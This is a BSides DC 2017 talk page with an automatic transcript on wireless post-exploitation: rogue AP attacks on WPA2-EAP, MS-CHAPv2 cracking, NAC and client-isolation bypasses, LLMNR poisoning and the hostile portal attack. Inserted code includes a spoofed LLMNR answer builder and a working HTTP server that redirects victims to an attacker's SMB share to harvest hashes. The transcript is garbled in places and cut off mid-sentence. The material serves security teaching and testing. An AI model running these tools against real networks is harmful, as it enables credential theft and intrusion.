
The Black Art of Wireless Post-Exploitation

BSides DC · 2017 · 50:00 · 290 views · Published 2017-10
Category: Technical
Team: Red
Style: Talk
About this talk
Wireless is an inherently insecure protocol. Most companies recognize this, and focus their resources on minimizing the impact of wireless breaches rather than preventing them outright. During red team engagements, the wireless perimeter is cracked within the opening days of the assessment, or it isn't cracked at all. From an attacker's perspective, the real challenge lies in moving laterally out of the isolated sandbox in which network administrators typically place their wireless networks. Enterprise network teams are typically aware of this fact, and many will attempt to justify weak wireless perimeter security by pointing out how difficult it is to pivot from the WLAN into production. However, preventing an attacker from doing so is only easy when the network in question is used exclusively for basic functions such as providing Internet connectivity to employees. When wireless networks are used to provide access to sensitive internal infrastructure, the issue of access control gets significantly messier. A door must be provided through which authorized entities can freely traverse. As with cryptographic backdoors, a door that requires a key is a door no less. In this presentation, we will focus on methods through which red team operators can extend their reach further into the network after gaining their initial wireless foothold. We'll begin with a quick recap on how to use rogue access point attacks to breach all but the most secure implementations of WPA2-EAP. We'll then demonstrate methods of evading the most commonly used methods of WLAN access control, and explore whether segmentation of a wireless network is truly possible. Finally, we will demonstrate how contemporary network attacks can be combined with wireless man-in-the-middle techniques to create brutal killchains that would be impossible to achieve over a wired medium. 
Gabriel Ryan (Security Engineer at Gotham Digital Science) Gabriel Ryan is a security consultant and researcher with a passion for wireless and infrastructure testing. He currently works for Gotham Digital Science at their New York office, where he provides full scope red team penetration testing capabilities for a diverse range of clients. He also contributes heavily to his company's research division, GDS labs. Previously, Gabriel has worked as a penetration tester and researcher for the Virginia-based defense contractor OGSystems, and as a systems programmer for Rutgers University. He also is a member of the BSides Las Vegas senior staff, coordinating wireless security for the event. In his spare time, he enjoys live music, exploring the outdoors, and riding motorcycles.
Transcript [en]

The BSides DC 2017 videos are brought to you by ThreatQuotient, introducing the industry's first threat intelligence platform designed to enable threat operations and management, and DataTribe, a new kind of startup studio co-building the next generation of commercial cybersecurity analytics and big data product companies. My name is Gabriel Ryan. I'm a penetration tester at Gotham Digital Science; we're Aon's security consulting arm, I guess I could call it that. Anyone here from Northern Virginia? Yeah. I'm really happy to be here, because my first security job was actually in Northern Virginia, so I'm pretty thrilled. I don't miss the traffic, though. So, a couple of new

things in this presentation. We're going to be talking about two new types of wireless technique. We're going to talk about hostile portal attacks, which is a way of grabbing Active Directory credentials without having direct network access, and we're also going to talk about indirect wireless pivots, which is a way of using rogue AP attacks to bypass port-based access control mechanisms on wireless networks. Before we go into any of this, we have to take an obligatory look at WPA2-EAP, and no discussion about WPA2-EAP is really complete without talking about rogue AP attacks, which is the means that you typically use to steal credentials for these kinds of networks. So rogue AP attacks are the real ones, the bread

and butter of modern wireless networks. You can use them for stealthy man-in-the-middle attacks, stealing RADIUS creds as we've said, all kinds of really cool stuff. The simplest example of a rogue AP attack out there is something called the evil twin attack. Just to use an analogy, actually first given to me by that guy right there, who got me into wireless, big round of applause for that guy. OK, sorry Scott. So a good analogy of how evil twin attacks work is: let's say that you have an open network, and we're going to call this DEFCON

Open, because it's probably the most secure network in existence. So you have these four devices, and they're associated with this network. If you were to spin up your own wireless hotspot, and you were to give this hotspot the same network name, SSID and channel as the one that you're attacking, how would these devices be able to tell the difference between these two access points? Well, the truth is that they wouldn't be able to, and as long as you're able to provide a better signal-to-noise ratio, that is, your signal strength is better than the other one's, these devices will actually drop their connections and associate with you. So that's the

fundamental rogue access point attack that pretty much everything else is based off of or spins off of. These attacks aren't anything new; they've been around for a really long time. They started to emerge around 2002. The first documentation that I could find was the Wireless LAN Security FAQ by C.W. Klaus, which starts talking about evil twin attacks. About a year later you have asleap, released by Josh Wright, which is a total spin-off of that. In 2004 you actually see the implementation of a KARMA attack by Dino Dai Zovi and Shane Macaulay. Four years after that you have FreeRADIUS-WPE, which is actually Josh

Wright and Brad Antoniewicz figuring out how to use these attacks to steal credentials from RADIUS networks. By 2014 KARMA attacks had actually stopped being as effective as they used to be, so two researchers from South Africa, Dominic White and Ian de Villiers, came up with the improved KARMA attacks and released a tool called MANA that made these attacks very, very effective once again. And very recently, the guy who wrote Wifiphisher came up with the Lure10 attack, which exploits Windows Wi-Fi Sense, a whole new way of doing this. So as you can see, this is actually a very,

there's a pretty rich history of using these kinds of attacks. Rogue AP attacks primarily fulfil one of two functions. The roles that they fall into are either man-in-the-middle attacks, which you can use to steal credentials for things, or they're used to breach WPA or WPA2 networks, the ones that use EAP. In this talk we're going to do something a little bit different: we're going to talk about rogue AP attacks as a means of lateral movement. Before we can continue, we also should talk about how you would use a rogue AP attack to breach a WPA2-EAP network. Anyone here actually know how

EAP works? OK, awesome, great. So we're going to start out with a logical, high-level look at how EAP works. We're looking at EAP-PEAP and EAP-TTLS specifically. Logically, the way that EAP works is that it's a transaction that occurs between the client and the authentication server. The first thing that happens is the client, that's your wireless device, your laptop or whatever, is going to send an authentication request to the authentication server. The authentication server is going to respond with an X.509 certificate and send it to the client. The reason why it's doing this is it needs to establish to the client that

it can be trusted; otherwise the client doesn't know who it's actually attempting to authenticate with. At this point the client then either accepts or rejects the certificate. If it accepts the certificate, it means it trusts the authentication server, and a secure tunnel is established between the client and the authentication server. Once that secure tunnel is established, we move on from the outer authentication, which is where we were before, and now begin what's called the inner authentication process. This is actually where credentials are entered: you enter your username and password, and that stuff gets sent to the authentication server. We'll look more at how that works in a

second, but that inner authentication is going to occur through this secure tunnel. The reason why you need that secure tunnel is, remember that EAP is the authentication mechanism that we're using to provide access to the WPA capabilities of the network, so until this entire process is finished, this WPA network is not actually operating as a WPA network. You don't get that WPA until after this process succeeds, so this entire transaction is happening over open Wi-Fi. Without the secure tunnel, a hacker could actually sniff the inner authentication process, take it offline and derive the password that way, and actually legacy implementations of EAP were highly susceptible to this. Think

of EAP-MD5, which was pretty prevalent, like, ten years ago. When I mentioned that there were two parties involved in this transaction, that's a bit of an understatement; there are actually three, the third being the authenticator. We talked about the client device; the technical name for that is the supplicant, that's your device that connects to the network. You have your authentication server, and this is the RADIUS server that's handling this transaction. But in the middle there's something else, and that's your access point. We refer to the access point as an authenticator; if you look at the RFCs, that's the name that's used. The job of the authenticator, the

access point, is to act as a mediator between the client device and the authentication server. The reason why we need this is that the supplicant is speaking over layer two and the authentication server only speaks over layer seven using the RADIUS protocol, so you need this access point in the middle to act as an intermediary. Now remember that this access point, until the process is finished, is acting as an open access point, right? So what this means is, remember how we talked about how open access points are susceptible to evil twin attacks and other rogue access point attacks? What that means is that, because until this process is completed

this access point, the authenticator, is also susceptible to those very same attacks. So what you can do as an attacker is impersonate a WPA2-EAP network and force clients to attempt to authenticate with you, and if you're using PEAP or EAP-TTLS as your outer authentication mechanism, then you're going to have a situation where you can force clients to connect to you, force them to authenticate with your own rogue RADIUS server, and hopefully what that will get you is an MS-CHAPv2 challenge and response, which you can then use to derive RADIUS passwords or RADIUS NT password hashes, which are password-equivalent. So this attack that I'm just describing was

first described by Brad Antoniewicz in 2008, and to make it even worse: is anyone here familiar with MS-CHAPv2? OK, a lot of you. Raise your hands: how many people think that MS-CHAPv2 is amazing? Yeah, I see some... no, no, OK. So the problem is that PEAP, for example, this outer authentication protocol, it's bad enough that you can force stuff to connect to you using a rogue AP attack, but the inner authentication mechanism that's typically used is MS-CHAPv2, and there are a couple of ways of cracking MS-CHAPv2. The traditional way is

that you take that EAP challenge and response that you've captured and iteratively perform a dictionary attack: take the password and the challenge and try to combine them to create an MS-CHAPv2 response, and you try these sequentially over and over again until you find the right password. That's a dictionary attack. Unfortunately, the success rate of this attack is inversely proportional to the strength of the password; the more complex that password, the more you're going to get diminishing returns. Fortunately or unfortunately, depending on your perspective, in 2012 a couple of researchers named Moxie Marlinspike and David Hulton came up with a

divide-and-conquer attack that can just completely bury MS-CHAPv2. It turns out that they discovered that MS-CHAPv2 basically uses 3DES encryption. If you're not familiar with what that means, 3DES you can actually break down into a single DES encryption, which is only 56 bits. NTLMv1 actually has the same problem. Because you can reduce it to this very, very small 56 bits of encryption, you can actually recover that password-equivalent NT hash that we mentioned earlier within 24 hours using a proper FPGA-based cracking rig, with a 100 percent success rate. So it's very, very crackable. So just a quick demo of how

this attack works. From the attacker's perspective, you'd first create a cert, which is what you're seeing here, and this is just a simple self-signed cert. Once you create that certificate, you then create the evil twin of the network that you're targeting. I'm going to fast forward through that a little bit, and you're going to get a client associating. So here you see the client associating with your network, and this is what you see from the attacker's perspective: you'd see the username, the challenge, the response, and that would all be sent to you as the client device attempts to authenticate with you. From there, the

dictionary attack, what it would look like using asleap, would be this. The divide-and-conquer is a bit complicated, so I'm not really showing it here, but that's pretty much what you'd see, and you see we were able to recover a password that way. The mitigation for this was introduced about ten years ago as well. In 2008 there was an RFC, 5216, and a new form of EAP was released called EAP-TLS. EAP-TLS uses mutual certificate-based authentication for its outer authentication layer, so because of this use of client-side certificates, it pretty much stops rogue AP attacks dead in their

tracks. The problem with EAP-TLS is that it's also really, really difficult to integrate. Any network administrators out there? Wow, OK. So from the perspective of a network administrator, the difficulty is that EAP-TLS can be really difficult to implement: you have to have an internal CA that you set up, you have to have a certificate placed on every single device that you want to be able to connect to your network, and all of this essentially creates a classic security-versus-convenience scenario where you're forced to choose between an authentication mechanism that's very, very difficult to implement, or using a very insecure authentication mechanism in the form of EAP-PEAP or EAP-TTLS.
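The exchange above hinges on the supplicant's decision to accept or reject the server's X.509 certificate, which is why a self-signed cert on an evil twin works at all. As an added example, not code from the talk, here is a small Python audit of a wpa_supplicant network block that reports when a PEAP/TTLS profile would accept an impostor certificate, with the weak block beside a hardened one and an EAP-TLS block; the configuration keys are wpa_supplicant's own, while the SSID, file paths and server name are constructed placeholders.

```python
"""Audit wpa_supplicant network blocks for the rogue-AP weakness described above.

Added example, not code from the talk. The keys (eap, ca_cert, domain_match,
phase2, client_cert, private_key, ...) are wpa_supplicant's own; the sample
blocks below are constructed.
"""
import re

NAME_PIN_KEYS = ("domain_match", "domain_suffix_match", "subject_match")


def parse_network_block(text):
    """Parse one `network={ ... }` block into a dict of key -> value."""
    inner = re.search(r"network\s*=\s*\{(.*)\}", text, re.S)
    body = inner.group(1) if inner else text
    cfg = {}
    for line in body.splitlines():
        line = line.split("#", 1)[0].strip()          # drop comments
        if "=" not in line:
            continue
        key, value = line.split("=", 1)
        cfg[key.strip()] = value.strip().strip('"')
    return cfg


def audit_supplicant_network(text):
    """Return a list of findings; an empty list means the block resists an evil twin.

    Outer authentication (PEAP/TTLS) is only as strong as the certificate check:
    a supplicant with no ca_cert accepts the self-signed cert a rogue AP presents
    and then sends its MS-CHAPv2 response down the attacker's tunnel.
    """
    cfg = parse_network_block(text)
    if cfg.get("key_mgmt", "").upper() != "WPA-EAP":
        return []                                     # not an 802.1X/EAP network
    eap = cfg.get("eap", "").upper()
    findings = []
    if eap in ("PEAP", "TTLS"):
        if "ca_cert" not in cfg:
            findings.append("no ca_cert: any server certificate is accepted")
        if not any(k in cfg for k in NAME_PIN_KEYS):
            findings.append("no domain_match/domain_suffix_match/subject_match: "
                            "a certificate for any name under the CA is accepted")
        if findings and "MSCHAPV2" in cfg.get("phase2", "").upper():
            findings.append("inner MSCHAPV2 challenge/response would be sent to "
                            "an unverified server")
    elif eap == "TLS":
        # Mutual certificate authentication needs the CA plus a client identity.
        for key in ("ca_cert", "client_cert", "private_key"):
            if key not in cfg:
                findings.append(f"EAP-TLS block missing {key}")
    else:
        findings.append(f"unrecognised or legacy EAP method: {eap or '(none)'}")
    return findings


# Constructed sample blocks (SSID, paths and server name are placeholders).
WEAK_PEAP = """
network={
    ssid="CorpWiFi"
    key_mgmt=WPA-EAP
    eap=PEAP
    identity="alice"
    password="placeholder"
    phase2="auth=MSCHAPV2"
}
"""

HARDENED_PEAP = """
network={
    ssid="CorpWiFi"
    key_mgmt=WPA-EAP
    eap=PEAP
    identity="alice"
    password="placeholder"
    ca_cert="/etc/ssl/certs/corp-ca.pem"
    domain_match="radius.corp.example"
    phase2="auth=MSCHAPV2"
}
"""

EAP_TLS = """
network={
    ssid="CorpWiFi"
    key_mgmt=WPA-EAP
    eap=TLS
    identity="alice@corp.example"
    ca_cert="/etc/ssl/certs/corp-ca.pem"
    client_cert="/etc/wpa/alice.crt"
    private_key="/etc/wpa/alice.key"
}
"""

if __name__ == "__main__":
    for name, block in (("weak PEAP", WEAK_PEAP), ("hardened PEAP", HARDENED_PEAP),
                        ("EAP-TLS", EAP_TLS)):
        print(f"{name}: {audit_supplicant_network(block) or ['ok']}")
```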

So this creates a market gap for products that can be used to compensate for the security issues found in EAP-PEAP and EAP-TTLS but are also easy to deploy and easy to use. The current trend that we see a lot is, instead of focusing on breach prevention, which would be preventing attackers from accessing the network in the first place, you instead see a focus on containing breaches that occur once the attacker is on the network. That's what we're trying to address here:

whether or not this strategy actually works. Before I continue, I have a little cartoon for you. OK, a little foreshadowing of what lies ahead. So the most popular way by far of addressing the problem of breach containment is to use a NAC mechanism to distinguish between authorized and unauthorized endpoints as they're added to the network. The idea here is a new endpoint is added to the network, a.k.a. a new device connects to the wireless network, and the NAC identifies whether this new endpoint is authorized to be there or not. If it's not authorized, some kind of restriction is placed on the device, usually placing it in a quarantine

VLAN where it can't really touch anything. Historically we've had two ways of doing this: you have agent-based NACs and you have agentless NACs. The way agent-based NACs work is that you have a software component called an agent that's installed on every single authorized endpoint on the network, and these agents communicate with the brain of the NAC and report back information about both the internals of the device as well as external information. So this is really effective; unfortunately, now you're in another situation where you have to have a piece of software living on every single

device on the network, and this makes it pretty much just as impractical as EAP-TLS. On the other side of the spectrum you have agentless NACs. Agentless NACs use combinations of passive fingerprinting, active scanning, traffic analysis, stuff like that, and the idea here is to take a completely external approach to identifying endpoints. However, the problem with this is that you have no way to identify or examine the internals of network components, so you can easily bypass these just by finding an authorized device to masquerade as. This kind of leads us back to the same problem we looked at before: you have a recurring dilemma of security

versus practicality. On one side of the spectrum you have these highly effective solutions in the form of agent-based NACs, and on the other you have very easy to deploy but less than effective solutions in the form of agentless NACs. So this leads to another market gap, where there's a huge demand for a solution that can offer the deep interrogation capabilities that you find with an agent-based NAC but without all that additional overhead. This has led to the rise of the next-generation NAC. These are actually pretty interesting; there are a lot of really interesting solutions. There's one in mind that I thought was a really interesting approach but

also, at the same time, really drives the point home as to why this isn't an easy paradox to bridge. Unfortunately, I actually tried to borrow one from work to bring here and do a demo with, so I opened up a ticket, and of course that didn't really go as I probably should have expected. Interestingly enough, legal also reached out to me, like, you've got to keep this vendor neutral. So I'm like, OK. In the interest of being vendor neutral, we're going to refer to this hardware vendor as Vendor A, and if you're really curious I'm sure you can

find a bunch of products that match the description on Google. But a really good example of this is Vendor A. Vendor A uses WMI to interrogate new devices as they're added to the network, and by doing this it's able to perform those deep internal checks without using an agent. The way it does this is it authenticates over SMB using a single administrative service account. A device is added, it authenticates with the device using the service account, or attempts to, and at that point, once it's authenticated with this device, it uses some pretty deep administrative privileges to look at the internals of the device and examine how it works. The problem with

this is that it creates a single... well, anyone see a problem with this yet? Yeah, Responder. So you have a single point of failure. You have a device that's authenticating with everything that's added to the network using this special service account, and this service account has access to nearly everything on the network. Typically it has DA privileges, actually, which is really scary. So you have this device that, although it's able to do these deep checks relatively easily, is also sending god-mode hashes to anything that you add to the network. So of course the first risk that comes to mind is using something

like Impacket or Responder to perform SMB relay attacks, where you just add something to the network, wait for this thing to authenticate with you, relay the authentication attempt to something else, and pivot into it. And actually you don't need a man-in-the-middle there, because the NAC appliance is trying to authenticate with you. Of course you can mitigate this fairly easily by enabling SMB signing, although it's worth mentioning that SMB signing is usually disabled by default on everything but the domain controller. But this doesn't really address the issue of hashes being sent directly to untrusted endpoints. So it's interesting that this vendor actually offers a piece of software that you can

install on every single thing on the network to address this issue. This is starting to sound a lot like an agent again, and considering that the chief selling point of this thing is that no agent is required, I feel like we're back to square one. And once again, I don't think that this particular solution is better or worse than any of the other, what's it called, next-generation NACs out there. I just think it's a really good example of how there really is no magic bullet in this situation. You

can't always have security with convenience, and especially when you're talking about access control or authorization or authentication, I think it's actually a total paradox. Going back to wireless in general, another really interesting wireless security control that you see a lot is client isolation. The idea behind client isolation is that you prevent wireless devices from communicating with one another. You usually use this as a security control; a typical use case would be an open network like the hotel here, for example. You may notice that you cannot ping other laptops that are associated with the network, and there's a reason for that: the idea is to keep people from

attacking each other once they're on the network. The way 802.11 is supposed to work is that the AP is supposed to mediate all communication on the network. So in theory, if this guy down here, can you guys see my mouse moving around? Cool. In theory the way that's supposed to work is, if this guy here is trying to communicate with this guy, the AP can just intercept the packet and drop it and say no, you can't do that. But the problem with this is that client isolation really is a logical control, not a physical control. Back in 2005 the late Cédric Blancher, awesome researcher, sadly no longer with us, posed a

question: how do you prevent radio transceivers from communicating with one another? And the answer was, you can't. So he introduced this tool called WiFiTap, which was released by Cédric Blancher in 2005 and later revived by Oliver Lavery of Gotham Digital Science; it's actually way before my time. The idea is that WiFiTap reads packets from the victim to the AP using a Wi-Fi interface in monitor mode, and it gives you a TUN/TAP device that's bridged to this monitor-mode interface and lets you interact with that monitor-mode interface, and what this allows you to do is inject responses to packets as if they came from the AP.

So this allows you to do two things. One, it actually lets you interact with devices that are associated with a wireless network without actually being associated with that wireless network yourself, and furthermore, it actually lets you bypass client isolation. I think I covered this stuff, OK. There are some later tools that do even more cool stuff. So airtun-ng: you can do the same attack with WEP. tkiptun-ng, this is also part of the aircrack suite, you can do this packet injection stuff but with WPA1. With WPA2 there are some attacks, theoretical attacks anyway, that really haven't been implemented, that theoretically

are able to do this with WPA2; Hole 196 comes to mind. It's worth mentioning that most of these are purely theoretical and actually haven't been tested, and are really up to considerable debate, but for the sake of being thorough I just threw them in there. But here's a quick demo of WiFiTap in general. If you look at the top right, we're actually going to create an access point. So we've created here an open access point with the SSID "example Wi-Fi", and we're going to connect to it from our host operating system. This is a VM, and this is a second VM, and this is our host

right here in the bottom right. So we're going to connect to "example Wi-Fi" from our host operating system, and then if we go down here we're just going to send a bunch of ICMP packets, five ICMP packets, to our AP from our host operating system, and you notice that we send five ICMP packets and we receive five responses. That's expected. Now what we're going to do is start up a modified version of WiFiTap called WiFiPing, which is actually a really cool way of demonstrating how this works. What WiFiPing does is, any time it sees an ICMP request, it injects an ICMP response,

and we're going to do that from the attacker's virtual machine over here, this terminal you see here. So we're going to start up WiFiPing, and WiFiPing is now running, and we're going to once again send five ICMP packets, but notice that instead of receiving five ICMP responses we see ten ICMP responses, and that's because we're injecting them from this thing. That just demonstrates a very simple wireless client isolation bypass. So, food for thought. So far I think a lot of the conversation has really been focused around whether or not a NAC can be used to stop direct attacks from an attacker

who's gained access to a wireless network, but what if we're missing the point here? Network access control isn't the only problem when containing wireless breaches. If you think about the role of NAC in a wireless network, it's being used to prevent attackers from accessing sensitive resources after a breach occurs. So when an unauthorized endpoint is detected, you take one of two possible actions: either you place the endpoint in quarantine or you block the port completely. So what this is, is that when you're violating access control policies, you're causing the NAC to impose some kind of restriction. In a wired network that's a physical

restriction, but in a wireless network this can only be a logical restriction, as we just saw with WiFiTap; more on that later. So I want you to imagine a pretty typical scenario. If you're incorporating wireless into your red team engagement or your pen test, you're attacking the wireless network, and this particular wireless network is used to access sensitive resources. In other words, a legitimate user could get on this wireless network and from there access stuff like production databases, the domain controller, eventually have that kind of access. It's not just used as a straight pipe out to the Internet. So assume you've already

breached the perimeter. Unfortunately, you as the attacker have been placed on a quarantine VLAN by the NAC appliance. So here's the NAC, here you are on this quarantine VLAN, and over on the restricted VLAN there's a bunch of sensitive resources, and that's ultimately what you want to get access to, because if you can't get access to that, you really haven't demonstrated anything in the first place. Fortunately for you, you know that you have at least one victim device on this restricted VLAN, because you would have had to use the rogue AP attack against this victim device in the first place to get RADIUS credentials that would get you

onto this network. So the question here is, how do we get out? How do we get from this quarantine VLAN over to this restricted VLAN, where we can actually get all the goodies, the sensitive resources? So, anybody here ever used Responder before? OK, yeah, everyone. For those of you who do not know, we have to go over a couple of things that we're going to incorporate into this attack, the pivot we're talking about. The first is LLMNR/NBT-NS poisoning. In case you're not aware, the way that NetBIOS name resolution works is that when a computer tries to

resolve a hostname using NetBIOS name resolution, it first checks its local cache. If that doesn't work, it's going to check its LMHOSTS file. If that doesn't work, it's going to attempt to use local DNS, and if that fails, we're going to fall back to two closely related protocols that pretty much behave the same way, LLMNR and NBT-NS. The way that works is LLMNR/NBT-NS is going to send a broadcast request out to the entire subnet. So think of two computers named Alice and Leroy. Leroy is a file server, and Alice wants to request a file from Leroy, but Alice does not know Leroy's IP. Alice

will first attempt to work through those first NetBIOS name resolution steps that we talked about before, but suppose that fails. At this point Alice is going to make a broadcast request to the entire subnet using LLMNR/NBT-NS, and every computer on Alice's subnet is going to receive this request, and what happens next really depends on the honor system. The idea is that only Leroy will respond to this broadcast request and provide Alice with an IP. Unfortunately, there's no honor among thieves. If we're an attacker and we're on the subnet, we can simply listen for these broadcast requests and respond to all of them, and if Alice

receives two responses, only the first one is considered valid. So this creates a race condition that can be exploited to trick Alice, the victim, into sending traffic to the attacker. So a quick demo: a pretty widely available tool called Responder, by Laurent Gaffié. You see here we have a bunch of rogue servers: an HTTP server, an SMB server. These are all listening for authentication attempts, and we have our poisoners, our LLMNR/NBT-NS poisoners, up there as well, and they're running, and we have our victim machine over on the right. So the victim machine is going to attempt to map a non-existent share, or

an SMB share our non-existent host right and what that's going to do is because the host doesn't actually exist it's going to force the fallback to element R and B T and s so allow us to attack it so we put in this non-existent host name as well as well as an SMB share and there we hash is on the left because it we were able to poison requests and forces try to authenticate with us so we're about 5% for a little escape attempt here but there's something else you have to cover as well the other thing we need to cover is redirect SMB so anybody familiar with redirect SMB okay this guy obviously obviously uses all the things cuz so
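Editor's added example, not part of the talk: the exchange described above at the packet level. LLMNR (RFC 4795) reuses the DNS message layout on UDP 5355, so the functions below build the query a resolver sends, build the answer that any host on the subnet can send back (a poisoner uses exactly the same message, which is the point), and model the victim's resolver, which accepts the first answer whose transaction ID matches. The host names and addresses are constructed for the example.

```python
import socket
import struct
from dataclasses import dataclass

LLMNR_GROUP = ("224.0.0.252", 5355)   # multicast group and port LLMNR queries are sent to
QTYPE_A, QCLASS_IN = 1, 1


def encode_name(name: str) -> bytes:
    """DNS-style label encoding: 'leroy' -> b'\\x05leroy\\x00'."""
    out = b""
    for label in name.rstrip(".").split("."):
        raw = label.encode("ascii")
        out += bytes([len(raw)]) + raw
    return out + b"\x00"


def decode_name(buf: bytes, off: int):
    """Return (name, offset after the name); handles the 0xC0 compression pointer used in answers."""
    labels = []
    while True:
        n = buf[off]
        if n & 0xC0 == 0xC0:                      # pointer back to the question name
            ptr = struct.unpack("!H", buf[off:off + 2])[0] & 0x3FFF
            name, _ = decode_name(buf, ptr)
            labels.append(name)
            return ".".join(labels), off + 2
        off += 1
        if n == 0:
            return ".".join(labels), off
        labels.append(buf[off:off + n].decode("ascii"))
        off += n


def build_query(txid: int, name: str) -> bytes:
    """What the victim broadcasts: header with QR=0, one question, no answers."""
    header = struct.pack("!HHHHHH", txid, 0x0000, 1, 0, 0, 0)
    return header + encode_name(name) + struct.pack("!HH", QTYPE_A, QCLASS_IN)


def build_response(query: bytes, answer_ip: str, ttl: int = 30) -> bytes:
    """Echo the query's ID and question, answer with an A record. Nothing in the protocol lets the
    resolver tell the real owner of the name from an attacker who copied these two fields."""
    txid = struct.unpack("!H", query[:2])[0]
    _, qend = decode_name(query, 12)
    question = query[12:qend + 4]                                  # name + QTYPE + QCLASS
    header = struct.pack("!HHHHHH", txid, 0x8000, 1, 1, 0, 0)      # QR=1, one answer
    answer = (b"\xC0\x0C"                                          # pointer to the question name
              + struct.pack("!HHIH", QTYPE_A, QCLASS_IN, ttl, 4)
              + socket.inet_aton(answer_ip))
    return header + question + answer


@dataclass
class Answer:
    txid: int
    name: str
    ip: str


def parse_response(pkt: bytes) -> Answer:
    txid, flags, qd, an = struct.unpack("!HHHH", pkt[:8])
    if not flags & 0x8000 or qd != 1 or an < 1:
        raise ValueError("not an LLMNR response carrying an answer")
    _, off = decode_name(pkt, 12)
    off += 4                                  # skip QTYPE/QCLASS of the echoed question
    name, off = decode_name(pkt, off)
    rtype, _, _, rdlen = struct.unpack("!HHIH", pkt[off:off + 10])
    off += 10
    if rtype != QTYPE_A or rdlen != 4:
        raise ValueError("unexpected record type")
    return Answer(txid, name, socket.inet_ntoa(pkt[off:off + 4]))


def resolve(query: bytes, responses):
    """Model of the victim's resolver: first response with a matching transaction ID wins.
    The ID is the only thing an unsolicited answer has to get right, and it was in the broadcast."""
    txid = struct.unpack("!H", query[:2])[0]
    for pkt in responses:                     # in arrival order
        try:
            ans = parse_response(pkt)
        except ValueError:
            continue
        if ans.txid == txid:
            return ans.ip
    return None


if __name__ == "__main__":
    q = build_query(0x1A2B, "leroy")                 # Alice asks for the file server
    legit = build_response(q, "10.0.0.20")          # Leeroy's real answer (constructed)
    evil = build_response(q, "10.0.0.66")           # attacker answers the same broadcast
    print(resolve(q, [evil, legit]))                # attacker arrived first: 10.0.0.66
```

Swapping the order in the list is the whole race: the resolver has no signature, no source check and no notion of who owns the name, only the 16-bit ID it just broadcast to everyone.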

Redirect to SMB: essentially, the idea is that you force a victim to visit an HTTP endpoint, and this HTTP endpoint corresponds to an HTTP server that you control. This HTTP server does one thing and one thing only, and that's redirect all HTTP requests to an SMB share, because you can do that. So what'll happen is the victim will click this link, their browser will go to your rogue HTTP server, your rogue HTTP server will redirect that browser to an SMB share on a server that you control, the browser will then be forced to authenticate with your rogue SMB server, and you get hashes that way. So this is pretty cool. It also

requires social engineering, because you have to force or coerce the user some way to click this link. So this is where we're going to start talking about new stuff. The first thing we'll introduce is the hostile portal attack. It's essentially a combination of the stuff we just talked about, and it's a means of leveraging that stuff to steal AD credentials from a wireless network without network access. So have you guys seen something like this lately? The captive portal, yeah, they're pretty cool, right? So a captive portal is used to restrict access to an open Wi-Fi network, and the way they usually work is that

you typically have a specially configured DNS server running that resolves all DNS queries to the captive portal, and also all DNS traffic will be redirected to the captive portal, so that the user cannot just manually specify their own DNS server. In addition to that, if you really want to be nasty, you can also redirect all HTTP traffic to the server that's hosting this captive portal login page. So the net effect is, no matter where you try to navigate to, you're just redirected to this login page. So a hostile portal attack kind of expands on this, right? It's based on both the Redirect to SMB and

also the captive portal technique, and the idea is that you first force a victim to connect to you using a rogue AP attack, but then what you do is you simply redirect all HTTP traffic to an SMB share on your machine, and you run a rogue SMB server in the background. So what happens is that the user is forced to connect to you, but instead of being redirected to a captive portal, they're redirected to your rogue SMB server, and then they're forced to authenticate with you and they give you hashes. So it's a really fast way to grab hashes. In addition, in case they
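Editor's added example, not code from the talk or from any tool it names: the HTTP half of the hostile portal, the one thing the rogue web server has to do. Every request, whatever the Host header or path, gets a 302 to a UNC path on the attacker's box in the `file://` URL form the Redirect to SMB technique uses, so a browser that follows it opens an SMB connection to the rogue server and the OS authenticates. The attacker address `10.0.0.66` and share name `files` are constructed; the wildcard DNS and the rogue SMB listener that actually captures the hashes (Responder or Impacket's SMB server in the talk's setups) are separate components and not shown here.

```python
from http.server import BaseHTTPRequestHandler, HTTPServer

ATTACKER_IP = "10.0.0.66"   # constructed: where the rogue SMB server is listening
SHARE = "files"             # constructed share name; it does not need to exist


def smb_redirect_target(attacker_ip: str = ATTACKER_IP, share: str = SHARE) -> str:
    """file:// URL to a UNC path. A browser that follows it opens \\\\attacker\\share over SMB,
    and the OS authenticates to the rogue server before any file is ever read."""
    return f"file://{attacker_ip}/{share}/"


def response_for(host: str, path: str):
    """The portal's entire decision table: whatever was asked for, answer with the SMB redirect.
    A captive portal would branch on host/path to serve its login page; this one never does."""
    return 302, {
        "Location": smb_redirect_target(),
        "Cache-Control": "no-store",   # every new request redirects again: fresh auth attempts
        "Content-Length": "0",
    }


class HostilePortalHandler(BaseHTTPRequestHandler):
    protocol_version = "HTTP/1.0"      # one request per connection, nothing to keep alive

    def _redirect(self):
        status, headers = response_for(self.headers.get("Host", ""), self.path)
        self.send_response(status)
        for name, value in headers.items():
            self.send_header(name, value)
        self.end_headers()

    do_GET = do_POST = do_HEAD = _redirect

    def log_message(self, fmt, *args):
        # who tripped the portal; correlate with the hashes the SMB server captures
        print(f"[portal] {self.client_address[0]} {self.command} "
              f"http://{self.headers.get('Host')}{self.path}")


def serve(bind: str = "0.0.0.0", port: int = 80):
    """Bind on the rogue AP's interface; pair with DNS that resolves everything to this host."""
    HTTPServer((bind, port), HostilePortalHandler).serve_forever()


if __name__ == "__main__":
    serve()
```

The `no-store` header matters more than it looks: without it a browser may cache the redirect for the host it first hit and stop sending requests you can redirect again, and each new redirect is another authentication attempt on the SMB side.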

just happen to be idle at the time, you can also poison LLMNR and NBT-NS in the background, so you can attack them that way as well, simultaneously. So, a quick demo of how this would work: this machine here is our legitimate network, and our victim is down in the bottom right and is associated with this legitimate network. This is an open network; we're going to talk about how to do this with WPA2-EAP networks in a second, but there are a couple more steps involved in doing so. Over here we have the attacker. The first thing the attacker is going to do is use some deauth

packets to force this victim to roam over to the attacker's rogue access point. Now the victim in the bottom right is going to open up IE, and the second that it starts sending HTTP traffic, you end up with hashes, which is what you see here. A really interesting thing about IE, right, is that when you type stuff in the address bar, it does an autocomplete thing which sends an HTTP request, so every time we type a new letter, we're actually receiving the hashes over and over again. So, good job, IE. So yeah, in most cases we also need to talk about how to do this with a

WPA2-EAP network, because in order to tie this to the scenario we were talking about earlier, we need to be able to use this with networks that use EAP-TTLS or EAP-PEAP. This actually is significantly harder, because both of these use MSCHAPv2 as an internal authentication mechanism, and it's a mutual authentication mechanism; what I mean by that is that the RADIUS server must actually prove knowledge of the client device's password for the internal authentication attempt to succeed. So previously we were able to demonstrate that you can force a victim to associate with you and attempt to authenticate with you, right, and it will

